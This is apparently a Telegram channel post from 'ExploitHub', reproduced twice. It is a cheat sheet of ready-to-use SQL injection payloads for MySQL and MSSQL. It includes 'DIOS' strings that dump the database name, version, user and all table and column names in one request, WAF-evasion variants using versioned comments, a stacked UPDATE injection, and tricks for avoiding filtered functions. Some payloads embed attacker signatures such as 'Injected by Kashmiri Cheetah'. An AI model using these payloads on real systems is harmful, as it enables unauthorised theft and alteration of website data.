ExploitHub

Some Information for SQL injection Lovers & some kinda DIOS Shit's
hope you will like don't forget to share :D
======================
1. Make_set DIOS without concat,concat_ws,group_concat
=======================
make_set(3,0x3c666f6e7420636f6c6f723d7265642073697a653d353e7377656574796f772c2c,version()),make_set(6,@sweet:=database(),(select 1 from(information_schema.tables)where(table_schema=database())and@sweet:=make_set(15,@sweet,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d333e,table_name,0x3c2f666f6e743e)),@sweet)
===============================
2.make_set DIOS with concat_ws
===============================
CONCAT_WS(0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d353e496e6a656374656420427920436c6f7564792056697275733c62723e3c2f666f6e743e,0x3c62723e,0x55736572203a20,system_user(),0x3c62723e,0x4461746162617365203a20,schema(),0x3c62723e,0x56657273696f6e203a20,innodb_version(),0x2d,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c6c693e,table_name,column_name)),@))
==================================
3. Print name without using 'amir',hex,mysqlchar,binary,or any thing :D
==================================
concat(conv(20,10,36),conv(10,10,32),conv(28,10,36),conv(17,10,36),conv(22,10,36),conv(18,10,36),conv(27,10,36),conv(18,10,36),0x20,conv(12,10,36),conv(17,10,36),conv(14,10,36),conv(14,10,36),conv(29,10,36),conv(10,10,36),conv(17,10,36),'<br>')
===================================
4. alternative of information_schema.tables||.columns
==================================
information_schema.key_column_usage information_schema.table_constraints information_schema.Partitions
===================================
5. update injection in mssql
==========================
; update table_name set detailText=db_name() where id=22
=============================
6. XML or error base DIOS in MSSQL
============================
'Injected by Kashmiri Cheetah'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
================================
7. Variable Method WAF DIOS
================================
@x:=concat+(0x3c703e3c623e3c693e3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920536f68616d3c2f666f6e743e3c2f693e3c2f623e3c2f703e,0x3c62723e, database/*a*/(),0x3c62723e,version/*a*/(),0x3c62723e,@:=0,(select+count(*)/*!50000from*/ /*!00000information_schema*/.columns+where+table_schema=/*!00000database*/()+and@:=concat+(@,0x3c6c693e,/*!00000table_name*/,0x3a3a,/*!00000column_name*/)),@)/
=================================
8. version without version() and @@version
=================================
(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
==================================
9. Count without Count function
===================================
databases:
concat( (select (@x) from (select (@x:=0),(@dbcount:=0), (select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,if(@dbcount:=@dbcount%2b1,0x0,0x0) ))))x), 'DB Count is : ',@dbcount)

tables:
concat( (select (@x) from (select (@x:=0),(@tblcount:=0), (select (0) from (information_schema.tables) where table_schema=database()and (0x00) in (@x:=concat(@x,if(@tblcount:=@tblcount%2b1,0x0,0x0) ))))x), 'Tables Count is : ',@tblcount)

www.tgoop.com/exploithub/6122

2.89K viewsOct 8, 2019 at 12:38

Some Information for SQL injection Lovers & some kinda DIOS Shit's
hope you will like don't forget to share :D
======================
1. Make_set DIOS without concat,concat_ws,group_concat
=======================
make_set(3,0x3c666f6e7420636f6c6f723d7265642073697a653d353e7377656574796f772c2c,version()),make_set(6,@sweet:=database(),(select 1 from(information_schema.tables)where(table_schema=database())and@sweet:=make_set(15,@sweet,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d333e,table_name,0x3c2f666f6e743e)),@sweet)
===============================
2.make_set DIOS with concat_ws
===============================
CONCAT_WS(0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d353e496e6a656374656420427920436c6f7564792056697275733c62723e3c2f666f6e743e,0x3c62723e,0x55736572203a20,system_user(),0x3c62723e,0x4461746162617365203a20,schema(),0x3c62723e,0x56657273696f6e203a20,innodb_version(),0x2d,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c6c693e,table_name,column_name)),@))
==================================
3. Print name without using 'amir',hex,mysqlchar,binary,or any thing :D
==================================
concat(conv(20,10,36),conv(10,10,32),conv(28,10,36),conv(17,10,36),conv(22,10,36),conv(18,10,36),conv(27,10,36),conv(18,10,36),0x20,conv(12,10,36),conv(17,10,36),conv(14,10,36),conv(14,10,36),conv(29,10,36),conv(10,10,36),conv(17,10,36),'<br>')
===================================
4. alternative of information_schema.tables||.columns
==================================
information_schema.key_column_usage information_schema.table_constraints information_schema.Partitions
===================================
5. update injection in mssql
==========================
; update table_name set detailText=db_name() where id=22
=============================
6. XML or error base DIOS in MSSQL
============================
'Injected by Kashmiri Cheetah'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
================================
7. Variable Method WAF DIOS
================================
@x:=concat+(0x3c703e3c623e3c693e3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920536f68616d3c2f666f6e743e3c2f693e3c2f623e3c2f703e,0x3c62723e, database/*a*/(),0x3c62723e,version/*a*/(),0x3c62723e,@:=0,(select+count(*)/*!50000from*/ /*!00000information_schema*/.columns+where+table_schema=/*!00000database*/()+and@:=concat+(@,0x3c6c693e,/*!00000table_name*/,0x3a3a,/*!00000column_name*/)),@)/
=================================
8. version without version() and @@version
=================================
(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
==================================
9. Count without Count function
===================================
databases:
concat( (select (@x) from (select (@x:=0),(@dbcount:=0), (select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,if(@dbcount:=@dbcount%2b1,0x0,0x0) ))))x), 'DB Count is : ',@dbcount)

tables:
concat( (select (@x) from (select (@x:=0),(@tblcount:=0), (select (0) from (information_schema.tables) where table_schema=database()and (0x00) in (@x:=concat(@x,if(@tblcount:=@tblcount%2b1,0x0,0x0) ))))x), 'Tables Count is : ',@tblcount)

BY ExploitHub